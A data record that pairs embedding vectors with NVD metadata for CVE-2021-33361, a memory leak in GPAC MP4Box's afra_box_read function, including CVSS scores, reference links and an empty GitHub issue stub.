-0.003371710889041424, -0.004512905143201351, -0.004594419151544571, 0.0062913899309933186, 0.012782859615981579, 0.00142186158336699, 0.003749638795852661, 0.00875162798911333, -0.01341274008154869, 0.0007590980967506766, -0.011300789192318916, 0.010930271819233894, -0.015398714691400528, -0.00775122968479991, -0.014865169301629066, 0.011804693378508091, -0.001063385745510459, 0.013872181996703148, 0.00309196999296546, -0.012567959725856781, 0.009596407413482666, 0.011145171709358692, 0.00038742253673262894, -0.011204454116523266, -0.01748843491077423, -0.026010340079665184, -0.005787486210465431, -0.011589792557060719, -0.005313223693519831, -0.009448200464248657, 0.004090514965355396, 0.006387724541127682, -0.010211466811597347, -0.01236787997186184, -0.009033220820128918, 0.023802055045962334, 0.010255929082632065, -0.009944694116711617, -0.002851133467629552, 0.00865529291331768, -0.03189416229724884, 0.011478637345135212, -0.027685081586241722, 0.016880786046385765, 0.012508676387369633, -0.01110811997205019, 0.000621543382294476, 0.012560549192130566, -0.0032420295756310225, -0.01535425242036581, -0.00037028611404821277, 0.0011967720929533243, 0.005731908604502678, 0.011767641641199589, -0.0011124793672934175, -0.006220991723239422, 0.013212660327553749, 0.004486969206482172, 0.015080069191753864, 0.025728747248649597, 0.004172028973698616, 0.0016534351743757725, 0.007854974828660488, 0.0012171505950391293, -0.0011282262858003378, -0.00296784657984972, 0.010174415074288845, -0.0034828661009669304, 0.022260701283812523, -0.0011374892201274633, -0.004005296155810356, -0.0186740905046463, 0.00806246418505907, -0.0014978176914155483, 0.012360469438135624, 0.006276569329202175, 0.006673023570328951, -0.014665089547634125, 0.006580393761396408, 0.012160390615463257, -0.007191747892647982, -0.007517803460359573, -0.036221809685230255, 0.0028770698700100183, 0.005683741066604853, -0.0019526281394064426, -0.00019486913515720516, 0.0019804169423878193, -0.026855120435357094, -0.0012569811660796404, -0.014961503446102142, 0.014857758767902851, -0.009218479506671429, 0.002321293344721198, 0.01914835348725319, 0.022527474910020828, 0.009885411709547043, 0.001323674456216395, -0.0007748450734652579, -0.0017358752666041255, 0.014679910615086555, -0.009870590642094612, 0.0051464904099702835, -0.022171778604388237, -0.00436840346083045, 0.0043165311217308044, 0.0103448536247015, 0.00316236843355, 0.009322225116193295, -0.0002644569904077798, 0.007158401422202587, 0.02389097958803177, 0.00011798672494478524, -0.0014487240696325898, 0.018763015046715736, 0.0035013919696211815, 0.010478239506483078, 0.004305415321141481, 0.003949718549847603, -0.004146093036979437, -0.009062862023711205, -0.006006091367453337, 0.018763015046715736, 0.020422933623194695, 0.02303137816488743, 0.005583701189607382, 0.0031920098699629307, 0.014857758767902851, -0.004953821189701557, -0.010033618658781052, -0.0036644197534769773, 0.010441187769174576, 0.005972744897007942, 0.016658475622534752, 0.021964287385344505, -0.019266918301582336, 0.01846660114824772, 0.02002277597784996, 0.020452575758099556, -0.007199158426374197, 0.008410750888288021, 0.016036005690693855, -0.018259111791849136, -0.005357685498893261, -0.007121349684894085, 0.021653052419424057, 0.013627639971673489, -0.013531305827200413, -0.014450189657509327, -0.007269556634128094, -0.0026195598766207695, 0.03865240514278412, -0.005276171490550041, -0.004927885252982378, -0.004668522626161575, 0.005346570163965225, -0.004946411121636629, -0.027951853349804878, 0.013501663692295551, 0.009811308234930038, 0.013842540793120861, 0.02104540355503559, -0.011019195429980755, 0.003104938194155693, 0.006243222858756781, 0.012316007167100906, -0.005872705020010471, 0.00618393998593092, 0.008521907031536102, -0.005246530286967754, -0.004064579028636217, 0.013175608590245247, -0.005931987892836332, -0.011938079260289669, 0.011893616989254951, -0.0034624875988811255, -0.007721588481217623, -0.0119529003277421, -0.0004534210020210594, -0.01969671994447708, 0.013123735785484314, -0.00010171868052566424, -0.02223106101155281, -0.006795294117182493, -0.009477842599153519, -0.000850801239721477, -0.01433903444558382, -0.01579887419939041, 0.013857360929250717, 0.012404931709170341, 0.012590190395712852, -0.023698311299085617, 0.00296784657984972, -0.024468988180160522, -0.0005219667800702155, 0.007514098659157753, -0.011145171709358692, -0.013709153980016708, -0.0008401488303206861, -0.019963491708040237, 0.009040631353855133, -0.0028214920312166214, 0.027507232502102852, -0.01594708114862442, 0.017873773351311684, -0.0030752967577427626, 0.016169391572475433, -0.02151966653764248, -0.003931192681193352, 0.033494796603918076, 0.0019100186182186007, 0.010915450751781464, 0.027225639671087265, -0.0017201283480972052, 0.014598396606743336, -0.011078478768467903, -0.004876012448221445, -0.011826924048364162, -0.012390111573040485, 0.015369073487818241, -0.008825731463730335, -0.0012069613439962268, -0.012642063200473785, 0.004976052325218916, -0.011678717099130154, 0.00509091280400753, 0.007495572790503502, -0.005887526087462902, -0.0006771210464648902, -0.010174415074288845, 0.007451110519468784, 0.013464611954987049, -0.02274978533387184, 0.006432186812162399, 0.006091310642659664, 0.003627368016168475, 0.010522701777517796, -0.0181701872497797, 0.011100709438323975, -0.005328044295310974, 0.02070452831685543, -0.01373138464987278, -0.029774799942970276, -0.01917799562215805, 0.010307801887392998, 0.010159594938158989, 0.012916246429085732, -0.023490820080041885, 0.010967323556542397, -0.00036449675098992884, -0.020897196605801582, 0.030589940026402473, 0.013635050505399704, 0.02629193477332592, 0.0072436206974089146, -0.028411295264959335, 0.017236482352018356, 0.009959515184164047, 0.002047110116109252, 0.016228673979640007, -0.014153774827718735, 0.008618241176009178, -0.0266179908066988, -0.009448200464248657, 0.009944694116711617, 0.002406512387096882, -0.01026333961635828, -0.01170835830271244, -0.03343551605939865, -0.006928680464625359, 0.01983010582625866, 0.016821501776576042, 0.012101107276976109, 0.022942453622817993, -0.014931862242519855, 0.000360791600542143, -0.012449393980205059, 0.021801259368658066, 0.007514098659157753, 0.02203839085996151, -0.014153774827718735, -0.014301982708275318, 0.008277365006506443, -0.02544715441763401, -0.02066006511449814, 0.04917510598897934, 0.01950404979288578, 0.017666282132267952, 0.007677126210182905, -0.005628163460642099, 0.016243495047092438, -0.00018375361105427146, -0.014887399971485138, -0.023476000875234604, 0.003249440109357238, -0.0056578051298856735, -0.016658475622534752, 0.023105481639504433, -0.017014171928167343, 0.019429946318268776, 0.0022360740695148706, 0.008336647413671017, -0.010167005471885204, -0.015991542488336563, -0.011478637345135212, -0.008188440464437008, -0.013138556852936745, 0.010937681421637535, -0.02664763107895851, 0.009603817947208881, 0.01551728043705225, 0.010870988480746746, -0.010270750150084496, 0.0004909359267912805, -0.0042646583169698715, 0.02103058248758316, 0.00033508692285977304, 0.005539239384233952, 0.0019581858068704605, -0.0031142011284828186, 0.006554457824677229, 0.0239058006554842, 0.009952104650437832, 0.014124133624136448, -0.004668522626161575, -0.00496493699029088, 0.012894014827907085, 0.0009147155215032399, -0.006958322133868933, 0.005383621901273727, 0.006124657113105059, 0.01135266199707985, -0.015532100573182106, 0.016065645962953568, 0.020482217893004417, 0.017192021012306213, -0.00010490281420061365, -0.020289547741413116, 0.02218659780919552, 0.011567561887204647, -0.010707960464060307, -0.003549559274688363, -0.0008521906565874815, -0.008129158057272434, -0.014635448344051838, -0.0026028866413980722, -0.007691946811974049, -0.009885411709547043, 0.012056645005941391, -0.004794498905539513, 0.004464738070964813, 0.0174736138433218, 0.002825197298079729, -0.02153448760509491, 0.008477444760501385, 0.016376880928874016, 0.008544137701392174, 0.001947070355527103, -0.007258441299200058, -0.022097675129771233, -0.0199931338429451, 0.015117120929062366, -0.0012060350272804499, 0.010804295539855957, -0.0031790416687726974, -0.019741181284189224, -0.02663281001150608, 0.013138556852936745, -0.002202727599069476, -0.002326851012185216, -0.011226685717701912, -0.0007197305676527321, -0.021149149164557457, -0.005272466689348221, 0.007354775909334421, 0.003271671012043953, 0.0011865828419104218, -0.018585165962576866, 0.00832182727754116, 0.013931464403867722, -0.022290343418717384, -0.012782859615981579, -0.016421344131231308, 0.0031216114293783903, 0.01987456902861595, 0.004042347893118858, 0.00694720633327961, -0.029552489519119263, 0.007210273761302233, 0.009048041887581348, -0.00824031326919794, -0.013820309191942215, -0.01341274008154869, -0.02372795157134533, 0.002463942626491189, 0.016910426318645477, 0.014227879233658314, -0.023831697180867195, 0.00814397819340229, 0.0026973686181008816, 0.002332408679649234, -0.0076845367439091206, 0.0006085752975195646, 0.00678047351539135, -0.0054688407108187675, -0.008796089328825474, -0.010404136031866074, 0.033672645688056946, 0.018096083775162697, 0.0055985222570598125, 0.010574574582278728, 0.002463942626491189, -0.0052984026260674, -0.02017098292708397, 0.02054150030016899, 0.003506949869915843, -0.009329634718596935, 0.03933415561914444, 0.026543885469436646, 0.0213862806558609, 0.007995771244168282, -0.011278558522462845, 0.021475205197930336, 0.020585961639881134, -0.01137489266693592, -0.00813656859099865, 0.031953442841768265, -0.005965334828943014, -0.013612819835543633, 0.009618639014661312, 0.0054021477699279785, -0.014694730751216412, 0.0028585437685251236, -0.000841075147036463, -0.013138556852936745, 0.005987565498799086, 0.024676477536559105, 0.014146365225315094, 0.0014181564329192042, 0.0035532645415514708, -0.0009350939653813839, 0.016317598521709442, 0.0015561742475256324, -0.02338707633316517, 0.015813695266842842, -0.013553536497056484, 0.0055799963884055614, 0.0054503148421645164, 0.014227879233658314, 0.0037626069970428944, 0.0009267573477700353, 0.00814397819340229, -0.009329634718596935, 0.007447405252605677, 0.007425174117088318, -0.016569551080465317, 0.00682123051956296, 0.00754373986274004, -0.008284775540232658, 0.011552740819752216, 0.012256724759936333, 0.017236482352018356, 0.013738795183598995, 0.01212333794683218, 0.00601720716804266, 0.024350421503186226, 0.004175734240561724, -0.009455610997974873, 0.0056578051298856735, 0.020793452858924866, -0.01762182079255581, 0.013034812174737453, -0.010241108946502209, 0.006706370040774345, 0.011663896031677723, 0.013271942734718323, -0.017933055758476257, 0.01442795805633068, -0.014472420327365398, 0.010070670396089554, 0.015050427988171577, 0.027032969519495964, 0.017562538385391235, 0.006217286456376314, 0.0004184533900115639, -0.01643616333603859, -0.006220991723239422, -0.001662698108702898, 0.004435096401721239 ]
121
CVE-2021-33361
2021-09-13T20:15:08.510000
Memory leak in the afra_box_read function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/a51f951b878c2b73c1d8e2f1518c7cdc5fb82c3f" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1782" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1782
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
[security]memory leak in MP4Box afra_box_read
https://api.github.com/repos/gpac/gpac/issues/1782/comments
0
2021-05-08T05:12:31
2023-09-22T06:09:46Z
https://github.com/gpac/gpac/issues/1782
880,294,671
1,782
true
This is a GitHub Issue repo:gpac owner:gpac Title : [security]memory leak in MP4Box afra_box_read Issue date: --- start body --- None --- end body ---
152
[ -0.02855638787150383, 0.027851847931742668, -0.0010830441024154425, 0.004425865598022938, 0.03516707941889763, 0.008536935783922672, -0.005943626165390015, 0.046829476952552795, -0.00995351281017065, 0.02143602818250656, -0.004661961458623409, 0.02055160515010357, 0.008964157663285732, -0.0021642143838107586, 0.0041223131120204926, 0.013333809562027454, -0.0030786185525357723, -0.011347603984177113, -0.0008075986406765878, -0.03426766395568848, 0.025948088616132736, -0.04014383628964424, -0.011677389033138752, 0.021451018750667572, -0.02056659571826458, 0.01668412610888481, -0.013603633269667625, 0.010155880823731422, 0.004024876747280359, 0.03246883675456047, 0.011137740686535835, 0.029470792040228844, -0.024748869240283966, 0.013191401958465576, 0.03942430391907692, -0.013791011646389961, 0.05318533629179001, 0.05897156521677971, 0.004141050856560469, -0.01521508302539587, -0.013213887810707092, -0.04826854169368744, -0.04575018212199211, 0.0011495632352307439, 0.002771318657323718, 0.011032809503376484, 0.013461226597428322, -0.01478036679327488, -0.025453411042690277, 0.012516842223703861, 0.026982413604855537, -0.04476082697510719, -0.011220186948776245, -0.05663308873772621, 0.0023440972436219454, -0.041043248027563095, 0.03642625734210014, -0.006472031585872173, -0.003738188650459051, 0.04125311225652695, 0.025423429906368256, 0.039184462279081345, -0.009466330520808697, 0.036786023527383804, -0.008716818876564503, 0.008192161098122597, -0.006303391885012388, 0.02788182720541954, -0.006517002359032631, 0.044461023062467575, -0.0032416372559964657, -0.022830121219158173, 0.004152293782681227, 0.01633935049176216, 0.024344133213162422, -0.04068348556756973, 0.05321531742811203, 0.02462894842028618, -0.018408002331852913, 0.026382803916931152, -0.0662568137049675, 0.049048032611608505, -0.010388229042291641, 0.030115371569991112, 0.011744845658540726, 0.0025202324613928795, -0.050577037036418915, -0.06367849558591843, -0.010125900618731976, -0.04080340638756752, -0.0032866080291569233, 0.030355215072631836, 0.01149001158773899, 0.0022522821091115475, 0.026637637987732887, -0.008971652947366238, -0.032708682119846344, -0.0055501325987279415, -0.036606140434741974, -0.015409956686198711, -0.03522704169154167, -0.03276864439249039, -0.01885771006345749, 0.010253317654132843, 0.01684901863336563, -0.007618784438818693, 0.02483881078660488, -0.03927440196275711, -0.006828049663454294, 0.13227379322052002, 0.031959168612957, 0.006858030334115028, -0.027911808341741562, 0.01615946739912033, 0.010080929845571518, 0.047818832099437714, -0.02139105834066868, -0.021975677460432053, -0.04542039707303047, -0.011257662437856197, 0.012936568818986416, -0.011534982360899448, -0.016054537147283554, 0.007772434037178755, -0.0032004141248762608, 0.04727918654680252, -0.002799425506964326, -0.006820554845035076, -0.04125311225652695, -0.0029493276961147785, -0.03876473382115364, 0.011759835295379162, 0.01923246495425701, -0.0456002801656723, -0.009766134433448315, -0.007064145989716053, -0.0011561214923858643, 0.02993548847734928, -0.01010341476649046, 0.027836857363581657, -0.058581817895174026, -0.04509061202406883, 0.023714544251561165, -0.01062807347625494, 0.00014510074106510729, -0.00704915588721633, 0.004362157080322504, -0.005538890138268471, -0.045300476253032684, 0.012449385598301888, 0.01018586102873087, -0.028166642412543297, 0.02597806788980961, 0.014600483700633049, 0.04670955613255501, -0.014675435610115528, 0.008387033827602863, 0.05063699558377266, -0.02191571705043316, -0.005568870343267918, -0.01902260258793831, -0.04113319143652916, 0.014952754601836205, -0.003668858902528882, -0.015724752098321915, -0.031869228929281235, 0.04898807033896446, 0.03243885934352875, -0.005209105089306831, 0.018632855266332626, 0.0018334925407543778, -0.010013473220169544, 0.025933098047971725, 0.039364345371723175, -0.026817521080374718, -0.016024556010961533, 0.008851731196045876, 0.025213567540049553, -0.04065350443124771, -0.025228556245565414, -0.0026026787236332893, 0.0370558500289917, -0.01436813548207283, -0.011287643574178219, -0.0035508107393980026, -0.008387033827602863, 0.03435760736465454, -0.02905106544494629, 0.030685000121593475, -0.0493178553879261, -0.003460869425907731, -0.0005063887219876051, 0.012471871450543404, -0.012202046811580658, 0.03546688333153725, -0.0029268423095345497, -0.028946133330464363, 0.00009960305033018813, -0.0030149100348353386, -0.0032510061282664537, 0.02002694644033909, -0.014975239522755146, 0.0063483621925115585, -0.018947651609778404, -0.04179276153445244, 0.00025459969765506685, -0.02178080379962921, 0.03411776199936867, -0.0042759631760418415, -0.01834804192185402, -0.02465892769396305, -0.010455685667693615, 0.014990230090916157, 0.013348800130188465, -0.0067156231962144375, 0.008469480089843273, -0.010515646077692509, -0.02161591127514839, -0.008372043259441853, -0.030400186777114868, 0.03312840685248375, -0.007929831743240356, 0.0275520421564579, -0.016579193994402885, 0.0031629386357963085, -0.03960418701171875, -0.016938960179686546, 0.012059640139341354, -0.015679780393838882, 0.005827452056109905, 0.029680656269192696, 0.01146003045141697, 0.02345971018075943, 0.013536177575588226, -0.00013783984468318522, 0.007386435754597187, -0.00851445086300373, -0.004339671693742275, 0.008372043259441853, 0.004729417618364096, -0.003206035355105996, 0.04218250885605812, -0.004819359164685011, -0.0214210394769907, -0.0003042548196390271, 0.06847537308931351, -0.03180926665663719, -0.0052878037095069885, -0.028286563232541084, 0.043591588735580444, 0.022320453077554703, -0.020461663603782654, -0.024179240688681602, -0.010927877388894558, -0.017973285168409348, 0.0031910452526062727, 0.02308495342731476, 0.02076146937906742, -0.022155560553073883, -0.04467088356614113, -0.030999796465039253, -0.010935372672975063, -0.021555950865149498, -0.013273848220705986, 0.002055535325780511, -0.02650272659957409, -0.007832394912838936, 0.009503806009888649, 0.007045408245176077, -0.02008690871298313, 0.015754731371998787, -0.012599288485944271, -0.021211175248026848, -0.028361516073346138, -0.006783078890293837, 0.0020574091468006372, -0.012726705521345139, 0.007465134374797344, 0.005452696233987808, 0.008836740627884865, -0.009556272067129612, -0.005666306708008051, -0.001709823147393763, 0.019262446090579033, -0.005947373807430267, 0.004418370313942432, 0.009233981370925903, 0.007862376049160957, 0.0019374872790649533, 0.019682172685861588, 0.002883745590224862, 0.04041365906596184, -0.016264399513602257, 0.02345971018075943, 0.025243546813726425, -0.000817904423456639, -0.001889705890789628, 0.016279390081763268, -0.024089299142360687, 0.004928037989884615, -0.0297556072473526, 0.026592668145895004, -0.015192598104476929, -0.018318060785531998, -0.018153168261051178, 0.03657616302371025, -0.02819662354886532, 0.02719227783381939, 0.02648773603141308, 0.004785630851984024, 0.0307899322360754, -0.05759246274828911, -0.013656099326908588, -0.006678147241473198, -0.013498702086508274, 0.0031498221214860678, -0.006307139061391354, -0.018497943878173828, -0.009841086342930794, 0.01578471250832081, -0.010245822370052338, 0.03621639683842659, -0.027971768751740456, 0.011422554962337017, 0.026217911392450333, -0.008289596997201443, -0.02381947636604309, 0.03399784117937088, -0.04763895273208618, 0.025618303567171097, -0.0016105128452181816, -0.012891598045825958, 0.0022241754923015833, -0.028511418029665947, 0.016189448535442352, -0.04416121914982796, -0.017733441665768623, 0.01747860759496689, 0.024718889966607094, -0.01496774423867464, -0.00027450858033262193, 0.004081089980900288, 0.03303846716880798, -0.0038318776059895754, -0.019097553566098213, -0.010440695099532604, -0.007618784438818693, 0.00985607597976923, 0.00874679908156395, -0.004564525093883276, 0.0009040982695296407, 0.011182711459696293, 0.019457317888736725, 0.05216600000858307, 0.029111025854945183, 0.03828504681587219, -0.019337397068738937, -0.01121269166469574, 0.018467962741851807, -0.006786826532334089, 0.016744086518883705, -0.023729534819722176, 0.015634810552001, 0.0166691355407238, 0.020131878554821014, 0.009398873895406723, -0.022155560553073883, -0.014135787263512611, -0.0083345677703619, -0.0026532707270234823, -0.002323485678061843, 0.04503064975142479, -0.05153641104698181, 0.04092332720756531, 0.02226049080491066, -0.012299483641982079, 0.026547696441411972, 0.026802530512213707, -0.004706932231783867, 0.003543315688148141, -0.04068348556756973, 0.01651923358440399, 0.027582023292779922, -0.044311121106147766, 0.00047687668120488524, 0.009578756988048553, -0.014240718446671963, 0.04524051398038864, -0.012756685726344585, -0.01905258186161518, -0.06187966838479042, 0.021376067772507668, -0.01554486807435751, -0.05132654681801796, -0.022890081629157066, 0.04047362133860588, -0.029830558225512505, -0.013326314277946949, 0.0026907462161034346, -0.03675604239106178, 0.03444754704833031, -0.020191838964819908, 0.0076749976724386215, 0.017613520845770836, -0.006708127912133932, 0.03888465836644173, 0.004871824756264687, -0.00874679908156395, 0.016429292038083076, -0.0040136342868208885, 0.03285858407616615, -0.01020085159689188, -0.02330980822443962, 0.03111971728503704, 0.019112544134259224, 0.023384759202599525, 0.009818600490689278, 0.022215520963072777, -0.03279862180352211, 0.06137000024318695, -0.017283735796809196, -0.0073602027259767056, 0.0018044488970190287, 0.005246580578386784, 0.03654618188738823, -0.0009040982695296407, 0.006636924110352993, -0.004804368596524, 0.04044364020228386, -0.046679574996232986, -0.011864767409861088, -0.012014669366180897, -0.0173586867749691, -0.029141006991267204, 0.030550088733434677, -0.03888465836644173, -0.05495418235659599, -0.04182274267077446, -0.010703024454414845, -0.023894427344202995, -0.01803324744105339, 0.03786532208323479, 0.00739018339663744, 0.010043454356491566, 0.053964827209711075, -0.047818832099437714, -0.012164571322500706, -0.005576365627348423, 0.030729971826076508, -0.030130362138152122, 0.0012947811046615243, -0.0004632917989511043, 0.005531394854187965, -0.026053018867969513, -0.0010427578818053007, -0.002790056634694338, 0.005546384956687689, -0.007255271542817354, 0.02160092070698738, 0.013910933397710323, -0.0010155880590900779, 0.015170113183557987, 0.00501797953620553, 0.011549971997737885, 0.023864446207880974, 0.013101461343467236, -0.021346086636185646, -0.020116887986660004, 0.010920382104814053, -0.030550088733434677, 0.01987704448401928, 0.011999678798019886, -0.00472192233428359, -0.002576445695012808, -0.02124115638434887, 0.03192919120192528, 0.007592551410198212, -0.017913324758410454, -0.005257823038846254, -0.04865828529000282, -0.020836420357227325, -0.012554317712783813, -0.00764876464381814, 0.009983493015170097, -0.02786683849990368, -0.0035227041225880384, -0.007914841175079346, -0.006565720774233341, -0.010568112134933472, -0.018767768517136574, 0.021720843389630318, -0.004294700920581818, 0.005332774482667446, -0.006314634345471859, 0.020791448652744293, -0.018123188987374306, 0.0071503398939967155, 0.0009434475796297193, 0.03294852375984192, 0.00263265916146338, 0.022860100492835045, -0.030729971826076508, 0.04014383628964424, 0.007922336459159851, 0.04350164905190468, -0.031149698421359062, -0.024074308574199677, 0.025723233819007874, -0.007689987774938345, -0.009706174023449421, -0.02806171029806137, -0.013731050305068493, -0.01768847182393074, -0.032888565212488174, -0.012172066606581211, -0.032588761299848557, 0.01786835491657257, -0.004425865598022938, 0.019262446090579033, 0.017298724502325058, -0.02497372403740883, -0.0037569263949990273, -0.02160092070698738, 0.004725669976323843, -0.009391379542648792, 0.03132957965135574, 0.001944982330314815, 0.01836303249001503, 0.03183924779295921, -0.009968503378331661, 0.010912887752056122, -0.024179240688681602, -0.029680656269192696, 0.022845109924674034, 0.0021361077670007944, -0.0005410535959526896, 0.011092769913375378, 0.0168040469288826, -0.013453731313347816, 0.015320015139877796, -0.0414629764854908, 0.04883816838264465, -0.010478170588612556, 0.03243885934352875, -0.012966549023985863, 0.033757999539375305, 0.010178365744650364, 0.010335763916373253, -0.004253477789461613, -0.019637200981378555, -0.01872279681265354, -0.016878999769687653, 0.004043614491820335, 0.015469917096197605, 0.004620738327503204, 0.018962640315294266, 0.02002694644033909, 0.007749949116259813, -0.0037775379605591297, 0.006888010539114475, -0.008214646019041538, 0.013138936832547188, 0.002359087346121669, -0.03462743014097214, -0.0019112543668597937, -0.004242234863340855, 0.010897897183895111, -0.004152293782681227, -0.027971768751740456, 0.00109522370621562, 0.008731808513402939, 0.0018100702436640859, 0.030340226367115974, 0.005999839399009943, -0.0046507189981639385, 0.004684446845203638, 0.008806760422885418, -0.005482676438987255, -0.01555985864251852, -0.015057685784995556, -0.005201609805226326, -0.017463617026805878, 0.010658053681254387, 0.015110151842236519, 0.004290953278541565, -0.027117326855659485, 0.005883665289729834, 0.004714427515864372, -0.04494071006774902, -0.018917670473456383, -0.008162179961800575, 0.017283735796809196, 0.019832074642181396, -0.017463617026805878, 0.0017529199831187725, -0.013633614405989647, -0.0011992184445261955, -0.0011448787990957499, 0.012674239464104176, 0.019457317888736725, -0.025393448770046234, 0.02990550920367241, 0.006640671752393246, -0.03795526176691055, -0.04335174337029457, -0.002291631419211626, 0.00534776458516717, 0.0056025986559689045, -0.04101327061653137, 0.03231893479824066, 0.03303846716880798, 0.009893551468849182, 0.05639324709773064, -0.0004766424826811999, 0.011182711459696293, 0.0055913557298481464, 0.03603651374578476, -0.012299483641982079, -0.00523159047588706, 0.012689230032265186, 0.02753705158829689, -0.03753553703427315, 0.02292006090283394, -0.04730916768312454, 0.014660445041954517, 0.008259616792201996, 0.006550730671733618, -0.041732799261808395, 0.00173230841755867, -0.005141648929566145, -0.02870628982782364, 0.0199070256203413, 0.011617428623139858, -0.05105672404170036, -0.03156942501664162, 0.008986642584204674, 0.032019130885601044, 0.011235177516937256, -0.005707530304789543, -0.009796115569770336, -0.004448350984603167, -0.011977193877100945, -0.030355215072631836, -0.00752134807407856, -0.011415060609579086, -0.005745005793869495, -0.011265157721936703, -0.00807223841547966, -0.0032510061282664537, 0.012112106196582317, -0.026472745463252068, -0.006858030334115028, 0.003429015167057514, 0.0036707324907183647, 0.04200262576341629, -0.011834786273539066, 0.020341742783784866, 0.04757899045944214, 0.003848741529509425, -0.015162617899477482, -0.0013191401958465576, -0.02773192524909973, -0.006254673469811678, -0.02193070575594902, 0.0034721121191978455, 0.005145396571606398, -0.020866399630904198, 0.026127971708774567, -0.006719370372593403, 0.00010364338959334418, 0.010703024454414845, -0.011752340011298656, 0.014195747673511505, 0.007457639556378126, -0.017058880999684334, -0.01683402806520462, -0.01668412610888481, 0.004245982505381107, -0.02330980822443962, -0.006903001107275486, -0.00024452811339870095, -0.02870628982782364, -0.0013734798412770033, -0.013970894739031792, -0.018902679905295372, 0.006678147241473198, 0.002657018369063735, -0.009668698534369469, -0.024613957852125168, -0.015065181069076061, 0.02552836202085018, -0.009451339952647686, 0.02819662354886532, 0.028811221942305565, -0.028181632980704308, -0.028526408597826958, 0.01668412610888481, 0.008589401841163635, -0.005452696233987808, 0.0022785149049013853, -0.023204876109957695, 0.019427338615059853, 0.006996689829975367, -0.01198468916118145, -0.01648925244808197, 0.0029680654406547546, -0.0019224969437345862, -0.004204759374260902, 0.03669608384370804, -0.009473825804889202, -0.0075138527899980545, 0.027132315561175346, -0.016864009201526642, 0.0199070256203413, -0.016624165698885918, -0.03144950419664383, 0.01713383197784424, -0.02887118235230446, 0.012411910109221935, 0.02092636190354824, -0.008094724267721176, -0.03993397206068039, -0.00777992932125926, -0.029185978695750237, 0.006250925827771425, 0.017898334190249443, 0.0032079091761261225, 0.018947651609778404, 0.01496774423867464, 0.011534982360899448, -0.021346086636185646, -0.029141006991267204, 0.005272813607007265, 0.005422715563327074, -0.007457639556378126, 0.023879436776041985, 0.006475779227912426, 0.023204876109957695, 0.03591659292578697, 0.019607221707701683, 0.0024359123781323433, 0.005280308425426483, -0.02173583395779133, -0.04365155100822449, 0.015110151842236519, -0.010658053681254387, -0.004171031527221203, -0.012097115628421307, -0.028796231374144554, 0.008694333024322987, 0.016429292038083076, 0.019322406500577927, 0.012291988357901573, -0.036456238478422165, -0.0018840845441445708, 0.0019787102937698364, 0.0239693783223629, -0.021900726482272148, 0.023384759202599525, -0.004448350984603167, -0.003578917356207967, -0.012029659934341908, -0.0002454650239087641, -0.0013744167517870665, -0.0025558341294527054, -0.0012488735374063253, 0.037985242903232574, -0.03684598580002785, 0.014233223162591457, -0.006843039765954018, 0.004583262838423252, -0.03414774313569069, -0.029530752450227737, -0.01713383197784424, 0.018917670473456383, 0.005321531556546688, -0.0020855157636106014, 0.01752357929944992, 0.023010002449154854, -0.014188252389431, -0.021555950865149498, 0.021136224269866943, -0.05264568701386452, 0.024224212393164635, 0.02143602818250656, -0.003687596647068858, 0.03108973614871502, 0.0017885217675939202, -0.005433958489447832, 0.024374114349484444, 0.01785336434841156, -0.009473825804889202, 0.01702890172600746, -0.03336825221776962, -0.02635282464325428, -0.02722225710749626, 0.029635684564709663, -0.006625681649893522, -0.008394529111683369, -0.013603633269667625, -0.009698678739368916, 0.0347173735499382, -0.02055160515010357, -0.03555682674050331, -0.03456747159361839, -0.010575607419013977, -0.01717880368232727, 0.03600653260946274, -0.0250037033110857, 0.01566478982567787, -0.002953075338155031, -0.0073002418503165245, 0.003964915871620178, -0.016429292038083076, 0.013970894739031792, -0.010395724326372147, 0.010920382104814053, -0.008124704472720623, -0.019442329183220863, -0.001584279933013022, -0.011032809503376484, 0.0009762387489899993, 0.0072515239007771015, -0.049227915704250336, 0.023909416049718857, -0.004302196204662323, 0.014338155277073383, 0.024583976715803146, 0.010987838730216026, 0.030535098165273666, -0.025693254545331, -0.02684750221669674, -0.009286447428166866, 0.01992201618850231, 0.006359605118632317, 0.023189885541796684, -0.0031573171727359295, -0.010680538602173328, -0.017613520845770836, 0.006648167036473751, -0.04569021984934807, -0.015177607536315918, -0.01566478982567787, -0.03942430391907692, -0.016564203426241875, -0.02549838088452816, 0.008521946147084236, -0.009766134433448315, 0.015604829415678978, -0.0010914760641753674, -0.0004775793640874326, 0.026652628555893898, 0.007540085818618536, 0.0275520421564579, 0.002415300812572241, 0.0003944304189644754, -0.011407565325498581, -0.013416255824267864, 0.01581469178199768, -0.011025314219295979, 0.03300848603248596, 